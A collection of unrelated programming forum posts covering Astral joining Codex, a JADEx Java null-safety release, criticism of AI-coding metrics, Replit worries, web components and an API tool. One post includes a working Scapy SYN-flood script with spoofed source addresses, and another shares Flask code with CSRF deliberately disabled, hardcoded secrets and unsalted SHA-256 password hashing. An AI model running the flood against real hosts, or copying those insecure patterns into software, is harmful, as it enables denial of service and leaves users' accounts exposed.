Today, AI is rapidly changing the way we build software, and the pace of that change is only accelerating. If our goal is to make programming more productive, then building at the frontier of AI and software feels like the highest-leverage thing we can do.

It is increasingly clear to me that Codex is that frontier. And by bringing Astral’s tooling and expertise to OpenAI, we’re putting ourselves in a position to push it forward. After joining the Codex team, we’ll continue building our open source tools, explore ways they can work more seamlessly with Codex, and expand our reach to think more broadly about the future of software development.

JADEx (Java Advanced Development Extension) is a practical Java safety layer that enhances the safety of your code by providing null-safety and readonly(final-by-default) enforcement. It strengthens Java’s type system without requiring a full rewrite, while fully leveraging existing Java libraries and tools.

As of v0.59, JADEx now ships a Gradle plugin alongside the existing IntelliJ plugin.

What JADEx does

JADEx extends Java at the source level with two core safety mechanisms:

Null-Safety

• Type → non-nullable by default
• Type? → nullable
• ?. → null-safe access operator
• ?: → Elvis operator (fallback value)

String? name = repository.findName(id);
String upper = name?.toLowerCase() ?: "UNKNOWN";

Compiles to standard Java:

@Nullable String name = repository.findName(id);
String upper = SafeAccess.ofNullable(name).map(t0 -> t0.toLowerCase()).orElseGet(() -> "UNKNOWN");

Readonly (Final-by-Default)

• A single apply readonly; directive makes fields, local variables, and parameters final by default
• Explicit mutable modifier for intentional mutability
• Violations reported as standard Java compile-time errors

What's new in v0.59 - Gradle Plugin

The JADEx Gradle plugin (io.github.nieuwmijnleven.jadex) integrates .jadex compilation into the standard Gradle build lifecycle via a compileJadex task.

plugins {
    id 'io.github.nieuwmijnleven.jadex' version '0.59'
}

• Default source directory: src/main/jadex
• Default output directory: build/generated/sources/jadex/main/java
• Optional jadex {} DSL block for custom configuration
• IntelliJ plugin now integrates with the Gradle plugin via the Gradle Tooling API for consistent path resolution between IDE and build pipeline

jadex {
    sourceDir = "src/main/jadex"
    outputDir = "build/generated/sources/jadex/main/java"
}

Other Improvements

• IntelliJ Plugin - Gradle Plugin Integration

  • The IntelliJ plugin now integrates with the JADEx Gradle plugin via the Gradle Tooling API.
  • Source and output directory resolution is now delegated to the Gradle plugin configuration, ensuring consistency between the IDE and the build pipeline.

• Parser Performance Optimization

  • Improved parser speed by optimizing parser rules.
  • Reduces analysis latency in the IDE, providing a smoother editing experience for large .jadex files.

Design philosophy

JADEx is not a new language. It does not modify the JVM. It operates purely at the source level and generates standard Java code, meaning it is fully compatible with existing Java libraries, tools, and workflows. The goal is to make null-safety and readonly(final-by-default) enforcement practical and incremental, applicable file by file to existing codebases without a full rewrite.

Links

• GitHub: https://github.com/nieuwmijnleven/JADEx
• Gradle Plugin Portal: https://plugins.gradle.org/plugin/io.github.nieuwmijnleven.jadex
• Tutorial: Making Your Java Code Null-Safe without Rewriting it
• Real-world example: Applying JADEx to a Real Java Project
• Release note for v0.59: https://github.com/nieuwmijnleven/JADEx/releases/tag/v0.59

Feedback and questions welcome.

Excerpt:

"Even within the coding, it's not working well," said Smiley. "I'll give you an example. Code can look right and pass the unit tests and still be wrong. The way you measure that is typically in benchmark tests. So a lot of these companies haven't engaged in a proper feedback loop to see what the impact of AI coding is on the outcomes they care about. Lines of code, number of [pull requests], these are liabilities. These are not measures of engineering excellence."

Measures of engineering excellence, said Smiley, include metrics like deployment frequency, lead time to production, change failure rate, mean time to restore, and incident severity. And we need a new set of metrics, he insists, to measure how AI affects engineering performance.

"We don't know what those are yet," he said.

One metric that might be helpful, he said, is measuring tokens burned to get to an approved pull request – a formally accepted change in software. That's the kind of thing that needs to be assessed to determine whether AI helps an organization's engineering practice.

To underscore the consequences of not having that kind of data, Smiley pointed to a recent attempt to rewrite SQLite in Rust using AI.

"It passed all the unit tests, the shape of the code looks right," he said. It's 3.7x more lines of code that performs 2,000 times worse than the actual SQLite. Two thousand times worse for a database is a non-viable product. It's a dumpster fire. Throw it away. All that money you spent on it is worthless."

All the optimism about using AI for coding, Smiley argues, comes from measuring the wrong things.

"Coding works if you measure lines of code and pull requests," he said. "Coding does not work if you measure quality and team performance. There's no evidence to suggest that that's moving in a positive direction."

To anyone reading, im leaving. The moderation on this place sucks.

I cant tell someone to add authentication to their app I cant tell anyone to self reflect

But people are allowed to bully others out of learning? yeah bye

cross-posted from: https://lemmy.zip/post/60932444

So some backstory here: I’m pretty much anti-AI, but I try to stay on top of things so I can make informed recommendations to leadership. Recently , they’ve come to me interested in using Replit “because it’s so easy” and they almost have a site built out how they want.

Besides the fact that it’s managed to blow up and nuke production, what are some pros/cons about it? I’m worried about things like BCDR, vulnerability scanning, separation of duties, etc. You know all the base things you should have in place too.

Hi there, I'm looking for good software architecture resources: blog, wiki or community.

I know good enough the basis of OOP and 'Design Pattern' and I'm looking for something more advanced.

One of my goal is to create local first software but anything with network and web archi are welcome too. 🙂

TLDR; I’ve been experimenting with react-like jsx-syntax with webcomponents to see if I could theoretically replace React in one of my projects. It is not ready for production use, but rather an exploration into CustomElements and modern browser capabilities.

https://github.com/positive-intentions/dim

The goal was to build functional Web Components that handle state management and DOM updates without the overhead of a massive JavaScript framework. By leveraging standard Web APIs and Proxy objects, I’ve managed to create a reactive programming model that feels familiar—using JSX—but stays much closer to the browser platform.

I wanted to see how far i could take web components before the architecture broke down. If you're interested in frontend software engineering or web standards, you might find the logic behind the updates (which avoid a traditional virtual DOM) interesting.

Full technical tutorial and deep dive: https://positive-intentions.com/docs/research/Tutorials/dim/dim-functional-webcomponents

Disclaimer: This project is not ready for production use. In fact, this project may be getting deprecated soon, but I’m sharing it because the unique details into custom elements and modern JavaScript performance might be interesting or educational for others exploring the web platform.

I wrote a minimalist fetch tool for Linux with Python programming language. Have a look: mlzfetch. UPDATE: Now with installation support (pip install .) Also I added a performance benchmark into README.

A compiled programming language with Korean keywuords, written in Rust - xodn348/han

I remember our professor at university (Gothenburg, Sweden) was teaching us object oriented programming and her example code had variable names and method names in Swedish because Java could deal with utf8 already beck then in 2008.

We were trying to convince one of the Arabic students to send in his stuff in Arabic, but he was too afraid.

Voiden is an offline-first, git-native API tool built on Markdown Voiden is an API client we have been building that takes a different approach from most existing tools.

It didn’t start with the idea of “building a better Postman”.

A bit of background. Over time, API tooling has become heavyweight: cloud dependencies for local work, forced accounts, proprietary formats, and workflows that break the moment you are offline. On top of that, time wasted on fixing API specs that don’t match the code, docs in separate random tools, tests also separate and an overall governance mess. Not to mention collaboration.

So we asked a simple question: What if an API tool respected how developers already work?

That led to a few core ideas:

• Offline-first , no accounts, no telemetry
• Git as the source of truth.
• Plain text files: specs, tests, and documentation live together in Markdown
• A programmable interface instead of static forms: requests are composed from reusable blocks (endpoints, headers, auth, params, bodies, etc.) that you can structure the way you want
• Plugin system for extending functionality rather than bloating the core with new features Some of our core plugins include gRPC,GraphQL,WebSockets,etc…

We have just also updated our docs to welcome community plugins, so teams can extend the tool for their own workflows or integrations. https://docs.voiden.md/docs/plugins/build-a-plugin

We opensourced Voiden because extensibility without openness just shifts the bottleneck. If (API) workflows should be transparent, the tools should be too.

Welcome to try out and share feedback- happy to chat with everyone.

Strong opinions are encouraged. :)

Github : https://github.com/VoidenHQ/voiden

Download here : https://voiden.md/download

I know it's very old now but I still didn't know about this kind of low level attack. I don't even know if it works or not but I still found it interesting.

from scapy.all import *
import random

target_ip = "192.168.1.1"
target_port = 80

def syn_flood():
    while True:
        # Randomize source IP and port
        src_ip = ".".join(map(str, (random.randint(0,255) for _ in range(4))))
        src_port = random.randint(1024, 65535)
        
        ip = IP(src=src_ip, dst=target_ip)
        tcp = TCP(sport=src_port, dport=target_port, flags="S")
        
        send(ip/tcp, verbose=0)

syn_flood()  # Uncomment to run (requires proper authorization)

Hello,

it seems like an easy question but I tried everything google and AI told me but flask still giving me CSRF token mismatched error. I don't know how to disable it. I threw everything I found online to disable CSRF but I can't disable it. it's so annoying. here is the code:

import mysql.connector
from mysql.connector import Error

from flask import Flask, request, jsonify,redirect, url_for
from authlib.integrations.flask_client import OAuth
import os
from flask_cors import CORS
from flask_jwt_extended import JWTManager, create_access_token, jwt_required, get_jwt_identity
# from flask_wtf.csrf import csrf_exempt

import hashlib
from flask import Flask
from flask_wtf import CSRFProtect

app = Flask(__name__)
app.config['WTF_CSRF_ENABLED'] = False  # Disable CSRF globally

csrf = CSRFProtect(app)  # This will now be disabled


try:
    print("TESTING CONNECTION TO MYSQL DATABASE...")
    connection = mysql.connector.connect(
        host='localhost',
        database='test',
        user='root',
        password='MySql@123'
    )

    if connection.is_connected():
        print("Connected to MySQL database")

        cur = connection.cursor()
        cur.execute("SELECT DATABASE();")
        record = cur.fetchone()
        print("You're connected to database: ", record)
except Error as e:
    print("Error while connecting to MySQL", e)
    exit(1)
finally:
    if connection.is_connected():
        cur.close()
        connection.close()
        print("MySQL connection is closed")
        print("TESTING DONE")


app.secret_key = "somethings_secret92387492837492387498"
app.config['SESSION_COOKIE_SAMESITE'] = 'Lax'
app.config['SESSION_COOKIE_SECURE'] = False
app.config['SESSION_COOKIE_HTTPONLY'] = True

CORS(app)
app.config['JWT_SECRET_KEY'] = "your_jwt_secret_key123487236428374628374628736"
jwt = JWTManager(app)


# OAuth configuration
oauth = OAuth(app)
google = oauth.register(
    name='google',
    client_id="CLIENT_ID",
    client_secret="CLIENT_SECRET",
    server_metadata_url='https://accounts.google.com/.well-known/openid-configuration',
    client_kwargs={
        'scope': 'openid email profile'
    }
)

@app.errorhandler(Exception)
def handle_exception(e):
    return jsonify({"error": str(e)}), 500

@app.route("/",)
@jwt_required()
def hello_world():
    return "<p>Hello, World!</p>"

@app.route("/register_by_email", methods=["POST"])
def register():
    username = request.form.get("username")
    email = request.form.get("email")
    password = request.form.get("password")

    with mysql.connector.connect(
        host='localhost',
        database='test',
        user='root',
        password='MySql@123'
    ) as connection:
        with connection.cursor() as cursor:
            cursor.execute("INSERT INTO users (username, email) VALUES (%s, %s)", (username, email))
            cursor.execute("SELECT LAST_INSERT_ID()")
            user_id = cursor.fetchone()[0]
            password_hash = hashlib.sha256(password.encode()).hexdigest()
            cursor.execute("INSERT INTO user_passwords (user_id, password_hash) VALUES (%s, %s)", (user_id, password_hash))
            connection.commit()
    return jsonify({"message": "User registered successfully", "user_id": user_id}), 201

@app.route("/login_by_email", methods=["POST"])
def login():
    email = request.form.get("email")
    password = request.form.get("password")

    with mysql.connector.connect(
        host='localhost',
        database='test',
        user='root',
        password='MySql@123'
    ) as connection:
        with connection.cursor() as cursor:
            cursor.execute("SELECT id FROM users WHERE email = %s", (email,))
            user = cursor.fetchone()
            if not user:
                return jsonify({"error": "User not found"}), 404
            user_id = user[0]
            password_hash = hashlib.sha256(password.encode()).hexdigest()
            cursor.execute("SELECT * FROM user_passwords WHERE user_id = %s AND password_hash = %s", (user_id, password_hash))
            if cursor.fetchone():
                return jsonify({"message": "Login successful", "user_id": user_id, "access_token": create_access_token(identity=email)}), 200
            else:
                return jsonify({"error": "Invalid credentials"}), 401


@app.route("/google_oauth_url",methods = ["GET"])
def login_with_google():
    redirect_uri = url_for('callback', _external=True)
    return google.create_authorization_url(redirect_uri)




@app.route("/callback",methods = ["GET"])
# @csrf_exempt
def callback():
    token = google.authorize_access_token()
    user_info = token.get("userinfo")

    return jsonify(user_info)

if __name__ == "__main__":
    app.run(debug=True)

Hello,

recently I was working on a project entirely made by AI. at first it looked plausible but as I dig deeper into the code I found out ton of security issues. we solved the security issues one by one. ( thankfully the site isn't released yet and only have beta testing users )

my question is that is it considered a security issue if I let the client ( browser ) make the supabase api call instead of routing those requests through the backend ( vercel ) even when I have made policies that prevents unauthorized users from submitting INSERT queries however I am still not sure if this is enough.

one thing that comes in my mind is that any authorized user can just spam the database and fill it with junk data but I think I can just ban that user and delete all the junk data relatively easily using a SQL query?

the thing is that I don't want to refactor AI code and make it "use server" instead of "use client". since I have to make a ton of changes and I am still learning Nextjs. ( thinking about using AI to fix AI code but I don't think it will work and don't want more AI slop in the codebase )

any suggestions are appreciated!

Over the decades, I’ve seen the common practices around creating functions change quite a bit.

Just like fast fashion replaced tailors with factory workers and machine operators, fast software will replace programmers with AI operators. And the market will demand many of them. Many more than large software companies employ today.

The new world will need more programmers (AI operators) than it needs now. Because the demand for custom software will soon start growing. Everyone will want their own Photoshop. Every developer will want their own IDE and their own Linux. And they will throw them away without hesitation. Just like I throw away my shoes every year and get new ones.

I share this here to see what are your thoughts on this.

Thank you Microslop